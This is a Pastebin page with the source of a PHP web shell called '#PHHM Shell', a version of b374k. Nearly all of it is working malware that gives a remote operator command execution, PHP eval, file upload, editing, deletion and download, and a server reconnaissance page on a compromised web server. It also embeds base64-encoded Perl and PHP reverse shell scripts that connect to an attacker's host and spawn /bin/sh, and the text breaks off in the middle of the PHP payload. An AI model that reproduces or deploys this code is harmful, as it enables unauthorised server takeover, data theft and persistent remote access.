Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*******************************************************************
- *******************************************************************
- *** #PHHM Shell ***
- *** Coded by nhax ***
- *** Fuck self-claimer ! ***
- *** Cai Kacak ***
- *** <3 <3 <3 <3 <3 ***
- *******************************************************************
- *******************************************************************/
- //error_reporting(0);
- if(isset($_GET['cwd'])){ $cwd = $_GET['cwd']; chdir($cwd); } else { $cwd = getcwd().DIRECTORY_SEPARATOR; chdir($cwd); }
- if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
- if(strtolower(substr(php_uname(),0,3)) == "win") $win = TRUE; else $win = FALSE;
- if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE;
- global $cwd;
- function perintah($perintah) {
- $res = '';
- if (!empty($perintah)) {
- if(function_exists('exec')) { @exec($perintah,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($perintah); }
- elseif(function_exists('system')) { @ob_start(); @system($perintah); $res = @ob_get_contents(); @ob_end_clean(); }
- elseif(function_exists('passthru')) { @ob_start(); @passthru($perintah); $res = @ob_get_contents(); @ob_end_clean(); }
- elseif(@is_resource($f = @popen($perintah,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }
- else { $res = "Perintah() Disabled! :("; }
- }
- return $res;
- }
- function ukuran($file){
- if($size = filesize($file)){
- if($size <= 1024){
- return "$size b";
- } else {
- if($size <= 1024*1024){
- $size = round($size / 1024,2);
- return "$size kb";
- } elseif($size <= 1024*1024*1024){
- $size = round($size / 1024 / 1024,2);
- return "$size mb";
- } elseif($size <= 1024*1024*1024*1024){
- $size = round($size / 1024 / 1024 / 1024,2);
- return "$size gb";
- }
- }
- }
- else return "0 b";
- }
- function showstat($stat){
- if ($stat=="on") {
- return "<b><font style='color: lime'>ON</font></b>";
- } else {
- return "<b><font style='color: red'>OFF</font></b>";
- }
- }
- function testperl() { if (perintah('perl -h')) { return showstat("on"); } else { return showstat("off"); } }
- function testfetch() { if(perintah('fetch --help')) { return showstat("on"); } else { return showstat("off"); } }
- function testwget() { if (perintah('wget --help')) { return showstat("on"); } else { return showstat("off"); } }
- function testoracle() { if (function_exists('ocilogon')) { return showstat("on"); } else { return showstat("off"); } }
- function testpostgresql() { if (function_exists('pg_connect')) { return showstat("on"); } else { return showstat("off"); } }
- function testmssql() { if (function_exists('mssql_connect')) { return showstat("on"); } else { return showstat("off"); } }
- function testcurl() { if (function_exists('curl_version')) { return showstat("on"); } else { return showstat("off"); } }
- function testmysql() { if (function_exists('mysql_connect')) { return showstat("on"); } else { return showstat("off"); } }
- function testpython() { if(perintah("python -h")){ return showstat("on"); } else { return showstat("off"); } }
- function testgcc() { if(perintah("gcc -h")){ return showstat("on"); } else { return showstat("off"); } }
- function b64wrt($file, $benda){
- if($fo = fopen($file, "w")){
- return (fwrite($fo, base64_decode($benda)) ? 1 : 0);
- } else {
- echo "Failed to open $file for writing <br />";
- }
- }
- if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on"){
- $quot = "<font style='color:red'>ON</font>";
- } else {
- $quot = "<font style='color: lime'>OFF</font>";
- }
- if(isset($_GET['action']) && $_GET['action'] == "dl" && $_GET['file'] != ""){
- $file = $_GET['file'];
- $filez = file_get_contents($file);
- header("Content-type: application/octet-stream");
- header("Content-length: ".strlen($filez));
- header("Content-disposition: attachment; filename=\"".basename($file)."\";");
- echo $filez;
- exit;
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "dlgzip" && $_GET['file'] != ""){
- $file = $_GET['file'];
- $filez = gzencode(file_get_contents($file));
- header("Content-Type: application/x-gzip\n");
- header("Content-length: ".strlen($filez));
- header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
- echo $filez;
- exit;
- }
- $bytes = disk_free_space(".");
- $si_prefix = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
- $base = 1024;
- $class = min((int)log($bytes , $base) , count($si_prefix) - 1);
- $totalspace_bytes = disk_total_space(".");
- $totalspace_si_prefixs = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
- $totalspace_bases = 1024;
- $totalspace_class = min((int)log($totalspace_bytes , $totalspace_bases) , count($totalspace_si_prefixs) - 1);
- $totalspace_show = sprintf('%1.2f' , $totalspace_bytes / pow($totalspace_bases,$totalspace_class)) . ' ' . $totalspace_si_prefixs[$totalspace_class] . '';
- $freespace_show = sprintf('%1.2f' , $bytes / pow($base,$class)) . ' ' . $si_prefix[$class] . '';
- if(!$win){
- if(!$user = rapih(perintah("whoami"))) $user = "";
- if(!$id = rapih(perintah("id"))) $id = "";
- $prompt = $user." \$ ";
- } else {
- $user = get_current_user();
- $id = $user;
- $prompt = $user." »";
- $v = explode("\\", $_GET['cwd']);
- $v = $v[0];
- $letters = "";
- foreach (range("A","Z") as $letter){
- if (is_dir($letter.":\\")){
- $letters.= " <a href=\"?cwd=".$letter.":\\\">[ ";
- if ($letter.":" != $v){
- $letters .= $letter;
- } else {
- $letters.= $letter;
- }
- $letters.= " ]</a> ";
- }
- }
- }
- $cwds = explode(DIRECTORY_SEPARATOR,$cwd);
- $cwdurl = "";
- for($i = 0 ; $i < sizeof($cwds)-1 ; $i++){
- $pathz= "";
- for($j= 0 ; $j <= $i ; $j++){
- $pathz .= $cwds[$j].DIRECTORY_SEPARATOR;
- }
- $cwdurl .= "<a href=\"?cwd=".$pathz."\">".$cwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
- }
- if(isset($_POST['rename'])){
- $old = $_POST['oldname'];
- $new = $_POST['newname'];
- rename($cwd.$old,$cwd.$new);
- $file = $cwd.$new;
- }
- if(isset($_POST['chmod'])){
- $name = $_POST['name'];
- $value = $_POST['newvalue'];
- if (strlen($value)==3){
- $value = 0 . "" . $value;
- }
- chmod($cwd.$name,octdec($value));
- $file = $cwd.$name;
- }
- if(isset($_POST['chmod_folder'])){
- $name = $_POST['name'];
- $value = $_POST['newvalue'];
- if (strlen($value)==3){
- $value = 0 . "" . $value;
- }
- chmod($cwd.$name,octdec($value));
- $file = $cwd.$name;
- }
- function clearspace($text){
- return str_replace(" ","_",$text);
- }
- function rapih($text){
- return trim(str_replace("<br />","",$text));
- }
- function magicboom($text){
- if (!get_magic_quotes_gpc()) {
- return $text;
- }
- return stripslashes($text);
- }
- function filemanager(){
- global $cwd, $cwdurl, $letters, $win, $posix, $user;
- $files = array();
- $folders = array();
- if($op = @opendir(".")){
- while($re = readdir($op)){
- if(is_file($re)){
- $files[] = $re;
- } elseif(is_dir($re)){
- $folders[] = $re;
- }
- }
- @closedir($op);
- } else {
- die("Failed to opendir()\n</body>");
- @closedir($op);
- }
- sort($files);
- sort($folders);
- $path = explode(DIRECTORY_SEPARATOR, $cwd);
- $tree = sizeof($path);
- $parent = "";
- $buff = "";
- if($tree > 2){
- for($i=0;$i<$tree-2;$i++){
- $parent .= $path[$i].DIRECTORY_SEPARATOR;
- }
- } else {
- $parent = $cwd;
- }
- $buff .= "<span class=\"fileman\">\n".
- "<table width=\"100%\">\n".
- "<tr>\n".
- " <th style=\"width: 25%;\">name</th>\n".
- " <th style=\"width: 5%;\">size</th>\n".
- " <th style=\"width: 10%;\">owner:group</th>\n".
- " <th style=\"width: 10%;\">perms</th>\n".
- " <th style=\"width: 10%;\">modified</th>\n".
- " <th style=\"width: 16%;\">actions</th>\n".
- "</tr>\n";
- foreach($folders as $folder){
- if($folder == "."){
- if(!$win && $posix){
- $name = posix_getpwuid(fileowner($folder));
- $group = posix_getgrgid(filegroup($folder));
- $owner = $name['name']." : ".$group['name'];
- } else {
- $owner = $user;
- }
- $buff .= "<tr>\n".
- " <td style=\"padding-left: 1em;\"><a href=\"?cwd=".$cwd."\" title=\"CHDIR to Self\">".$folder."</a> − ".(is_writable($cwd) ? "<span style=\"color: #0f0;\">WRITABLE</span>" : "<span style=\"color: #f00;\">NOT WRITABLE</span>")."</td>\n".
- " <td style=\"text-align: center;\">DIR</td>\n".
- " <td style=\"text-align: center;\">".$owner."</td>\n".
- " <td style=\"text-align: center;\">".get_perms($folder)."</td>\n".
- " <td style=\"text-align: center;\">".@date("d-M-Y H:i",filemtime($cwd))."</td>\n".
- " <td style=\"text-align: center;\">\n".
- " <span id=\"titik1\">\n".
- " <a href=\"?cwd=".$cwd."&action=edit&file=".$cwd."newfile.php\" title=\"new file\">new file</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>\n".
- " <form action=\"?\" method=\"get\" id=\"titik1_form\" style=\"display:none;margin:0;padding:0;\"> \n".
- " <input type=\"hidden\" name=\"cwd\" value=\"".$cwd."\">\n".
- " <input type=\"hidden\" name=\"action\" value=\"mkdir\">\n".
- " New folder: <input type=\"text\" name=\"folder\" placeholder=\"Folder Name\" class=\"kotak\">\n".
- " <input type=\"submit\" value=\"Go\" class=\"kotak\">\n".
- " </form>\n".
- " </span>\n".
- " </td>\n".
- "</tr>";
- } elseif($folder == ".."){
- if(!$win && $posix){
- $name = posix_getpwuid(fileowner($folder));
- $group = posix_getgrgid(filegroup($folder));
- $owner = $name['name']." : ".$group['name'];
- } else {
- $owner = $user;
- }
- $buff .= "<tr>\n".
- " <td style=\"padding-left: 1em;\"><a href=\"?cwd=".$parent."\" title=\"CHDIR to ".$parent."\">".$folder."</a> − ".(is_writable($parent) ? "<span style=\"color: #0f0;\">WRITABLE</span>" : "<span style=\"color: #f00;\">NOT WRITABLE</span>")."</td>\n".
- " <td style=\"text-align: center;\">DIR</td>\n".
- " <td style=\"text-align: center;\">".$owner."</td>\n".
- " <td style=\"text-align: center;\">".get_perms($folder)."</td>\n".
- " <td style=\"text-align: center;\">".@date("d-M-Y H:i",filemtime($folder))."</td>\n".
- " <td style=\"text-align: center;\">-</td>\n".
- "</tr>";
- } else {
- if(!$win && $posix){
- $name = posix_getpwuid(fileowner($folder));
- $group = posix_getgrgid(filegroup($folder));
- $owner = $name['name']." : ".$group['name'];
- } else {
- $owner = $user;
- }
- $buff .= "<tr>\n".
- " <td style=\"padding-left: 1em;\">\n".
- " <a id=\"".clearspace($folder)."_link\" href=\"?cwd=".$cwd.$folder.DIRECTORY_SEPARATOR."\" title=\"CHDIR to ".$cwd.$folder.DIRECTORY_SEPARATOR."\">[ ".$folder." ]</a> − ".(is_writable($cwd.$folder) ? "<span style=\"color: #0f0;\">WRITABLE</span>" : "<span style=\"color: #f00;\">NOT WRITABLE</span>")."\n".
- " <form action=\"?cwd=".$cwd."\" method=\"post\" id=\"".clearspace($folder)."_form\" style=\"display:none; padding:0;margin:0;\">\n".
- " <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />\n".
- " <input class=\"kotak\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />\n".
- " <input class=\"kotak\" type=\"submit\" name=\"rename\" value=\"rename\" />\n".
- " <input class=\"kotak\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />\n".
- " </form>\n".
- " </td>\n".
- " <td style=\"text-align: center;\">DIR</td>\n".
- " <td style=\"text-align: center;\">".$owner."</td>\n".
- " <td style=\"text-align: center;\">\n".
- " <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($cwd.$folder)."</a>\n".
- " <form action=\"?cwd=".$cwd."\" method=\"post\" id=\"".clearspace($folder)."_form3\" style=\"display:none; padding:0;margin:0;\"> \n".
- " <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /> \n".
- " <input class=\"kotak\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($cwd.$folder)), -4)."\" /> \n".
- " <input class=\"kotak\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />\n".
- " <input class=\"kotak\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />\n".
- " </form>\n".
- " </td>\n".
- " <td style=\"text-align: center;\">".@date("d-M-Y H:i",filemtime($folder))."</td>\n".
- " <td style=\"text-align: center;\">\n".
- " <a href=\"?cwd=".$cwd."&action=rmdir&folder=".$cwd.$folder."\">delete</a> | <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>\n".
- " </td>\n".
- "</tr>";
- }
- }
- foreach($files as $file){
- if(!$win && $posix){
- $name = posix_getpwuid(fileowner($file));
- $group = posix_getgrgid(filegroup($file));
- $owner = $name['name']." : ".$group['name'];
- } else {
- $owner = $user;
- }
- $buff .= "<tr>\n".
- " <td style=\"padding-left: 1em;\">\n".
- " <a id=\"".clearspace($file)."_link\" href=\"?cwd=".$cwd."&action=view&file=".str_replace(" ", "+", $cwd.$file)."\" title=\"View file ".$file."\">".$file."</a> − ".(is_writable($cwd.$file) ? "<span style=\"color: #0f0;\">WRITABLE</span>" : "<span style=\"color: #f00;\">NOT WRITABLE</span>")."\n".
- " <form action=\"?cwd=".$cwd."\" method=\"post\" id=\"".clearspace($file)."_form\" style=\"display:none; padding:0;margin:0;\">\n".
- " <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />\n".
- " <input class=\"kotak\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />\n".
- " <input class=\"kotak\" type=\"submit\" name=\"rename\" value=\"rename\" />\n".
- " <input class=\"kotak\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />\n".
- " </form>\n".
- " </td>\n".
- " <td style=\"text-align: center;\">".ukuran($file)."</td>\n".
- " <td style=\"text-align: center;\">".$owner."</td>\n".
- " <td style=\"text-align: center;\">\n".
- " <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form3');\">".get_perms($cwd.$file)."</a>\n".
- " <form action=\"?cwd=".$cwd."\" method=\"post\" id=\"".clearspace($file)."_form3\" style=\"display:none; padding:0;margin:0;\"> \n".
- " <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" /> \n".
- " <input class=\"kotak\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($cwd.$file)), -4)."\" /> \n".
- " <input class=\"kotak\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" /> \n".
- " <input class=\"kotak\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form3');\" />\n".
- " </form>\n".
- " </td>\n".
- " <td style=\"text-align: center;\">".@date("d-M-Y H:i",filemtime($file))."</td>\n".
- " <td style=\"text-align: center;\">\n".
- " <a href=\"?cwd=".$cwd."&action=edit&file=".str_replace(" ", "+", $cwd.$file)."\" title=\"Edit ".$cwd.$file."\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?cwd=".$cwd."&action=del&file=".$cwd.$file."\">delete</a> | <a href=\"?cwd=".$cwd."&action=dl&file=".$cwd.$file."\">download</a> (<a href=\"?cwd=".$cwd."&action=dlgzip&file=".$cwd.$file."\">gz</a>)\n".
- " </td>\n".
- "</tr>";
- }
- $buff .= "</table>\n</span>";
- echo $buff;
- }
- function get_perms($file){
- if($mode=fileperms($file)){
- $perms = "";
- $perms .= ($mode & 00400) ? 'r' : '-';
- $perms .= ($mode & 00200) ? 'w' : '-';
- $perms .= ($mode & 00100) ? 'x' : '-';
- $perms .= ($mode & 00040) ? 'r' : '-';
- $perms .= ($mode & 00020) ? 'w' : '-';
- $perms .= ($mode & 00010) ? 'x' : '-';
- $perms .= ($mode & 00004) ? 'r' : '-';
- $perms .= ($mode & 00002) ? 'w' : '-';
- $perms .= ($mode & 00001) ? 'x' : '-';
- return $perms;
- }
- else return "??????????";
- }
- // folder2 //
- /*if(is_writable($cwd)){
- if(!is_dir($cwd.".PHHM_files")){ mkdir($cwd.".PHHM_files", 0777); }
- if(!is_dir($cwd.".PHHM_files/sym")){ mkdir($cwd.".PHHM_files/sym", 0777); }
- if(!is_dir($cwd.".PHHM_files/sym/perl")){ mkdir($cwd.".PHHM_files/sym/perl", 0777); }
- if(!is_dir($cwd.".PHHM_files/sym/php")){ mkdir($cwd.".PHHM_files/sym/php", 0777); }
- if(!is_dir($cwd.".PHHM_files/bc")){ mkdir($cwd.".PHHM_files/bc", 0777); }
- }*/
- ?>
- <!--
- --------------------------------------------------------------------------
- - Official release
- - Coded by Cai@nhax based on b374k NEC v3
- - Gua hanya reParse & fix & remove serba sedikit benda yang ada dalam ni
- - 100% Credit to REAL coder
- - Follow @0xCai
- - "Majulah Hejes untuk negara"
- -
- - #PHHM #HEJES #GILA #HEMPAS
- ---------------------------------------------------------------------------
- -->
- <html>
- <head>
- <title>#PHHM Shell</title>
- <script type="text/javascript">
- function tukar(lama,baru){
- document.getElementById(lama).style.display = 'none';
- document.getElementById(baru).style.display = 'block';
- }
- </script>
- <link rel="icon" type="image/png" href="http://www.iconsdb.com/icons/preview/black/x-mark-4-xl.png" />
- <style>
- body { background: #000; color: #fff; font-family: Tahoma; font-size: 13px; padding-top: 1em; }
- body a { color: #f00; text-decoration: none; }
- * a:hover { text-decoration: underline; }
- footer { border-top: 0; position: fixed; left:0px; right:0px; bottom:0px; text-align: Right; font-family: Courier New; color: gray; }
- footer:hover { color: #fff; }
- fieldset { border-color: #fff; border-style: solid; border-radius: 3px; background: #111; }
- fieldset:hover { background: #101010; }
- #menu a { border: 1px solid #f00; color: #f00; padding: 5px; padding-left: 3em; padding-right: 3em; text-decoration: none; }
- #menu a:hover { border: 1px solid #fff; border-radius: 1px; color: #fff; }
- #menu a:active { border: 1px solid #0f0; color: #0f0; }
- .fileman { padding: 2px; }
- .fileman * { color: #f00; }
- .fileman table { border: 0; }
- .fileman tr:hover { background: #744F4F; }
- .fileman th { color: #fff; background: #111; }
- .fileman td,th { border: 1px solid #f00; font-family: Arial; font-size: 13px; padding: 2px; border-radius: 2px; }
- .fileman a { color: #2BA8EC; text-decoration: none; }
- .fileman a:hover,active { color: gray; }
- .kotak { border: 1px solid #f00; border-radius: 1px; padding: 1px; padding-left: 3px; padding-right: 3px; background: #111; font-family: Tahoma; color: #fff; }
- .kotak:active { box-shadow: 0px 0px 5px #f00; }
- h1.cantik { border: 1px solid #fff; border-radius: 3px; text-align: Center; font-family: Calibri; }
- #viewfile { background: #111; border: 1px solid #fff; border-radius: 3px; padding: 5px; }
- </style>
- </head>
- <body>
- <div id="menu" align="center">
- <a href="?" title="Main">Main</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=info" title="Info">Info</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=shell" title="Shell">Shell</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=upload" title="Uploader">Upload</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=eval" title="Eval PHP Codes">Eval PHP</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=phpinfo" title="PHP Info">PhpInfo</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=tools" title="Tools">Tools</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=jumping" title="Jumping">Jumping</a>
- <a href="?cwd=<?php echo $cwd; ?>&action=sym_menu" title="Symlink: menu">Symlink</a>
- <br /><br />
- </div>
- <?php
- if($win){
- echo $cwdurl . " − ". $letters;
- } else {
- echo $cwdurl;
- }
- echo "− <a href=\"?cwd=".$_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR."\" title=\"Document Root\">[ Doc. Root ]</a><br /><hr color=\"red\"><br />";
- if(isset($_GET['action']) && $_GET['action'] == "info"){
- echo "<form action=\"?cwd=".$cwd."&action=info\" method=\"post\">\n".
- "<h1 class=\"cantik\">Server Info</h1>\n".
- $_SERVER['SERVER_SOFTWARE'] . "<br />\n".
- php_uname("a") . "<br />\n";
- if($posix) echo rapih(perintah("id")) . "<br />\n";
- elseif($win) echo rapih(perintah("whoami")) . "<br />\n";
- echo "Your IP: " . $_SERVER['REMOTE_ADDR'] . " | Server IP: " . $_SERVER['SERVER_ADDR'] . "<br />\n".
- "Free " . $freespace_show . " of " . $totalspace_show . "<br />\n".
- "Perl: ".testperl()." | Fetch: ".testfetch()." | WGet: ".testwget()." | cURL: ".testcurl()." | Oracle: ".testoracle()." | PostgreSQL: ".testpostgresql()." | MsSQL: ".testmssql()." | MySQL: ".testmysql()." | Python: ".testpython()." | GCC: ".testgcc()."<br />\n";
- if($safemode){
- echo "Safemode is <span style=\"color: red\">ON</span><br />\n";
- } else {
- echo "Safemode is <span style=\"color: lime\">OFF</span><br />\n";
- }
- echo "Magic Quotes is ".$quot."<br />";
- if(ini_get("disable_functions") == ""){
- echo $dsbf = "<span style=\"color: #0f0;\">NONE</span>";
- } else {
- echo $dsbf = "<span style=\"color: #f00;\">".ini_get("disable_functions")."</span>";
- }
- echo "</form>";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "shell"){
- echo "<form action=\"?cwd=$cwd&action=shell\" method=\"post\">\n".
- "<h1 class=\"cantik\">CMD/Shell</h1>\n".
- "<textarea cols=\"100\" rows=\"25\" name=\"out\" class=\"kotak\" readonly>\n";
- if(isset($_POST['submit'])){
- echo htmlspecialchars(perintah($_POST['cmd']));
- }
- echo "</textarea> <br />\n".
- "<input type=\"text\" name=\"cmd\" style=\"width: 50%;\" placeholder=\"cmd\" class=\"kotak\">\n".
- "<input type=\"submit\" name=\"submit\" class=\"kotak\">\n".
- "</form>\n";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "upload"){
- echo "<form action=\"?cwd=$cwd&action=upload\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\">\n".
- " <h1 class=\"cantik\">File Uploader</h1>\n".
- " File: <input type=\"file\" name=\"file\" class=\"kotak\" size=\"50\"> <br />\n".
- " Path: <input type=\"text\" name=\"path\" value=\"$cwd\" style=\"width: 25%;\" class=\"kotak\"> <br />\n".
- " <input type=\"submit\" name=\"submit\" value=\"upload file\" class=\"kotak\"> <br />\n".
- "</form>\n";
- if(isset($_POST['submit'])){
- if(is_uploaded_file($_FILES['file']['tmp_name'])){
- $pindah = magicboom($_POST['path']).$_FILES['file']['name'];
- if ($stat = move_uploaded_file($_FILES['file']['tmp_name'], $pindah)){
- $msg = "file uploaded to <a href=\"?cwd=".$cwd."&action=view&file=".$pindah."\">".$pindah."</a>";
- } else {
- $msg = "failed to upload ".$_FILES['file']['name'];
- }
- } else {
- $msg = "failed to upload ".$_FILES['file']['name'];
- }
- echo $msg;
- }
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "phpinfo"){
- @ob_start();
- @eval("phpinfo();");
- $buff = @ob_get_contents();
- @ob_end_clean();
- $awal = strpos($buff,"<body>")+6;
- $akhir = strpos($buff,"</body>");
- echo "<h1 class=\"cantik\">PHP Info</h1>\n".
- "<div class=\"fileman\">".substr($buff,$awal,$akhir-$awal)."</div>";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "eval"){
- echo "<form action=\"?cwd=$cwd&action=eval\" method=\"post\">\n".
- "<h1 class=\"cantik\">Eval PHP codes</h1>\n".
- "<textarea cols=\"100\" rows=\"25\" name=\"phpcode\" class=\"kotak\">\n";
- if(isset($_POST['submit'])){ echo htmlspecialchars(eval(magicboom($_POST['phpcode']))); }
- echo "</textarea>\n".
- "<input type=\"submit\" name=\"submit\" value=\"execute php\" class=\"kotak\">\n".
- "</form>\n";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "tools"){
- if(!$win && $posix){
- $bc = array(
- "pl" => "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7",
- "php" => "PD9waHANCnNldF90aW1lX2xpbWl0ICgwKTsNCmlmKFBIUF9TQVBJICE9ICJjbGkiKSBkaWUoIk5vdCBHVUkiKTsgDQppZigkYXJndiA8IDEpIGRpZSgiSW52YWxpZCIpOw0KJGlwID0gJGFyZ3ZbMV07ICRwb3J0ID0gJGFyZ3ZbMl07ICRjaHVua19zaXplID0gMTQwMDsgJHdyaXRlX2EgPSBudWxsOyAkZXJyb3JfYSA9IG51bGw7ICRzaGVsbCA9ICIvYmluL3NoIC1pIjsgJGRhZW1vbiA9IDA7ICRkZWJ1ZyA9IDA7DQppZiAoZnVuY3Rpb25fZXhpc3RzKCdwY250bF9mb3JrJykpIHsNCiRwaWQgPSBwY250bF9mb3JrKCk7DQppZiAoJHBpZCA9PSAtMSkgeyBwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOyBleGl0KDEpOyB9DQppZiAoJHBpZCkgeyBleGl0KDApOyB9DQppZiAocG9zaXhfc2V0c2lkKCkgPT0gLTEpIHsgcHJpbnRpdCgiRXJyb3I6IENhbid0IHNldHNpZCgpIik7IGV4aXQoMSk7IH0NCiRkYWVtb24gPSAxOw0KfSBlbHNlIHsgcHJpbnRpdCgiV0FSTklORzogRmFpbGVkIHRvIGRhZW1vbmlzZS4gIFRoaXMgaXMgcXVpdGUgY29tbW9uIGFuZCBub3QgZmF0YWwuIik7IH0NCi8vY2hkaXIoIi8iKTsNCnVtYXNrKDApOw0KJHNvY2sgPSBmc29ja29wZW4oJGlwLCAkcG9ydCwgJGVycm5vLCAkZXJyc3RyLCAzMCk7DQppZiAoISRzb2NrKSB7IHByaW50aXQoIiRlcnJzdHIgKCRlcnJubykiKTsgZXhpdCgxKTsgfQ0KJGRlc2NyaXB0b3JzcGVjID0gYXJyYXkoMCA9PiBhcnJheSgicGlwZSIsICJyIiksMSA9PiBhcnJheSgicGlwZSIsICJ3IiksMiA9PiBhcnJheSgicGlwZSIsICJ3IikpOw0KJHByb2Nlc3MgPSBwcm9jX29wZW4oJHNoZWxsLCAkZGVzY3JpcHRvcnNwZWMsICRwaXBlcyk7DQppZiAoIWlzX3Jlc291cmNlKCRwcm9jZXNzKSkgeyBwcmludGl0KCJFUlJPUjogQ2FuJ3Qgc3Bhd24gc2hlbGwiKTsgZXhpdCgxKTsgfQ0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMF0sIDApOw0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMV0sIDApOw0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMl0sIDApOw0Kc3RyZWFtX3NldF9ibG9ja2luZygkc29jaywgMCk7DQpwcmludGl0KCJTdWNjZXNzZnVsbHkgb3BlbmVkIHJldmVyc2Ugc2hlbGwgdG8gJGlwOiRwb3J0Iik7DQp3aGlsZSAoMSkgeyBpZiAoZmVvZigkc29jaykpIHsgcHJpbnRpdCgiRVJST1I6IFNoZWxsIGNvbm5lY3Rpb24gdGVybWluYXRlZCIpOyBicmVhazsgfQ0KaWYgKGZlb2YoJHBpcGVzWzFdKSkgeyBwcmludGl0KCJFUlJPUjogU2hlbGwgcHJvY2VzcyB0ZXJtaW5hdGVkIik7IGJyZWFrOyB9DQokcmVhZF9hID0gYXJyYXkoJHNvY2ssICRwaXBlc1sxXSwgJHBpcGVzWzJdKTsNCiRudW1fY2hhbmdlZF9zb2NrZXRzID0gc3RyZWFtX3NlbGVjdCgkcmVhZF9hLCAkd3JpdGVfYSwgJGVycm9yX2EsIG51bGwpOw0KaWYgKGluX2FycmF5KCRzb2NrLCAkcmVhZF9hKSkgeyBpZiAoJGRlYnVnKSBwcmludGl0KCJTT0NLIFJFQUQiKTsgJGlucHV0ID0gZnJlYWQoJHNvY2ssICRjaHVua19zaXplKTsgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSzogJGlucHV0Iik7IGZ3cml0ZSgkcGlwZXNbMF0sICRpbnB1dCk7IH0NCmlmIChpbl9hcnJheSgkcGlwZXNbMV0sICRyZWFkX2EpKSB7IGlmICgkZGVidWcpIHByaW50aXQoIlNURE9VVCBSRUFEIik7ICRpbnB1dCA9IGZyZWFkKCRwaXBlc1sxXSwgJGNodW5rX3NpemUpOyBpZiAoJGRlYnVnKSBwcmludGl0KCJTVERPVVQ6ICRpbnB1dCIpOyBmd3JpdGUoJHNvY2ssICRpbnB1dCk7IH0NCmlmIChpbl9hcnJheSgkcGlwZXNbMl0sICRyZWFkX2EpKSB7IGlmICgkZGVidWcpIHByaW50aXQoIlNUREVSUiBSRUFEIik7ICRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOyBpZiAoJGRlYnVnKSBwcmludGl0KCJTVERFUlI6ICRpbnB1dCIpOyBm